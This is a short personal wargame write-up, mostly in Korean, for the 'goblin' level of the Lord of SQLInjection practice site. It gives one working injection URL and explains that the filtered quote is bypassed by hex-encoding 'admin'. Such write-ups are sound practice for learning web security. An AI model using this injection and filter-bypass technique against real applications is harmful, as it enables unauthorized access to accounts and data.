이동현 Donghyun Lee

Welcome!
Wargame
CTF
- AlexCTF 2017
  - [Crypto] CR3: What is this encryption?
  - [Crypto] CR4: Poor RSA
- BSides San Francisco CTF 2017
  - [Crypto] []root
project
- How to Find Container Platform Escape Bug
Donghyun's Lifelog

Powered by GitBook

On this page

Was this helpful?

Wargame

Lord of SQLInjection

goblin

Previouscobolt Nextorc

Last updated 5 years ago

Was this helpful?

첫 화면이다.

https://los.rubiya.kr/chall/goblin_e5afb87a6716708e3af46a849517afdc.php?no=0%20or%20id%20=%200x61646d696e 에 접속하면 문제가 풀린다.

no에 0 or id = 'admin' 을 넣은 셈이다.

다만 ' 가 필터링 되기 때문에 이를 우회하기 위해 문자열을 hex 값으로 변환하여 넣어주었다.